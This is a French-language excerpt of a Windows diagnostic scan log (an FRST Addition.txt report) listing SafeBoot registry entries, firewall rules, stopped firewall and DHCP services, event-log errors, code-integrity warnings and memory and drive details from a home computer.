HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Shseoojoo => ""="service"

==================== EXE Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)


==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)


==================== Hosts contenu: ===============================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2013-08-22 14:25 - 2016-01-09 20:37 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-452054049-3322805463-2325735685-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Lindsay.Neth\Pictures\IMG_0441.PNG
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
MpsSvc => Le service Pare-feu n'est pas actif.
bfe => Le service Pare-feu n'est pas actif.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

(Actuellement, il n'y a pas de correction automatique pour cette section.)


==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{F9174584-4BF8-432A-AFAA-459F385F331D}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{8DDA4AF9-AB80-437A-AE10-45A8B35CA033}] => (Allow) C:\Users\Lindsay.Neth\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [TCP Query User{00101530-98BD-4798-B630-7983B9983B75}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{7666DD02-4082-473F-A4CF-0A623841C5AF}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{CACF551C-C2FA-4569-A33B-845B11A2D138}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{CF91DE95-6083-4608-B30C-9EE259B69A78}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{739BB20B-24A7-409D-91FE-444AABFCD2A2}] => (Allow) C:\Users\Lindsay.Neth\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{A5C1E903-AB8A-469B-81FE-2DF7551AADB9}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{98BE17DD-AB14-458E-8D24-426BF72BCE8D}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe

==================== Points de restauration =========================

Vérifiez le service "winmgmt" ou réparez WMI.


==================== Éléments en erreur du Gestionnaire de périphériques =============


==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (01/09/2016 09:22:02 PM) (Source: Microsoft-Windows-LocationProvider) (EventID: 2002) (User: AUTORITE NT)
Description: There was an error starting the Windows Location Provider

Error: (01/09/2016 08:55:55 PM) (Source: Microsoft-Windows-LocationProvider) (EventID: 2002) (User: AUTORITE NT)
Description: There was an error starting the Windows Location Provider

Error: (01/09/2016 08:43:24 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1

Error: (01/09/2016 08:43:24 PM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1

Error: (01/09/2016 05:09:57 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1

Error: (01/09/2016 05:09:57 PM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1

Error: (01/09/2016 04:09:03 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80070005

Error: (01/09/2016 03:45:49 PM) (Source: Microsoft-Windows-LocationProvider) (EventID: 2002) (User: AUTORITE NT)
Description: There was an error starting the Windows Location Provider

Error: (01/09/2016 03:42:35 PM) (Source: Microsoft-Windows-LocationProvider) (EventID: 2002) (User: AUTORITE NT)
Description: There was an error starting the Windows Location Provider

Error: (01/09/2016 01:16:47 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1


Erreurs système:
=============
Error: (01/09/2016 09:34:21 PM) (Source: DCOM) (EventID: 10005) (User: AUTORITE NT)
Description: 1068netprofmNon disponible{A47979D2-C419-11D9-A5B4-001185AD2B89}

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Service Liste des réseaux dépend du service Connaissance des emplacements réseau qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Connaissance des emplacements réseau dépend du service Client DHCP qui n’a pas pu démarrer en raison de l’erreur :
%%1062

Error: (01/09/2016 09:34:21 PM) (Source: DCOM) (EventID: 10005) (User: AUTORITE NT)
Description: 1068netprofmNon disponible{A47979D2-C419-11D9-A5B4-001185AD2B89}

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Service Liste des réseaux dépend du service Connaissance des emplacements réseau qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Connaissance des emplacements réseau dépend du service Client DHCP qui n’a pas pu démarrer en raison de l’erreur :
%%1062

Error: (01/09/2016 09:34:21 PM) (Source: DCOM) (EventID: 10005) (User: AUTORITE NT)
Description: 1068netprofmNon disponible{A47979D2-C419-11D9-A5B4-001185AD2B89}

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Service Liste des réseaux dépend du service Connaissance des emplacements réseau qui n’a pas pu démarrer en raison de l’erreur :
%%1068

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Le service Connaissance des emplacements réseau dépend du service Client DHCP qui n’a pas pu démarrer en raison de l’erreur :
%%5

Error: (01/09/2016 09:34:21 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Le service Client DHCP s’est arrêté avec l’erreur :
%%5


CodeIntegrity:
===================================
Date: 2016-01-02 22:39:59.499
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\BubbleSound\BubbleSound.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-02 22:39:58.496
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\BubbleSound\BubbleSound.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-02 22:39:58.074
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\BubbleSound\BubbleSound.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-02 22:39:57.574
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\BubbleSound\BubbleSound.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-02 22:39:57.151
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\BubbleSound\BubbleSound.dll because the set of per-page image hashes could not be found on the system.


==================== Infos Mémoire ===========================

Processeur: Intel(R) Celeron(R) CPU N2840 @ 2.16GHz
Pourcentage de mémoire utilisée: 47%
Mémoire physique - RAM - totale: 1939.04 MB
Mémoire physique - RAM - disponible: 1024.54 MB
Mémoire virtuelle totale: 3283.04 MB
Mémoire virtuelle disponible: 2115.89 MB

==================== Lecteurs ================================

Drive c: (Windows) (Fixed) (Total:21.08 GB) (Free:4.93 GB) NTFS
Drive d: (DDE-SHAMAN) (Fixed) (Total:298.01 GB) (Free:56.03 GB) FAT32

==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: 3E86BB82)

Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E8239852)
Partition 1: (Not Active) - (Size=298.1 GB) - (Type=0B)

==================== Fin de Addition.txt ============================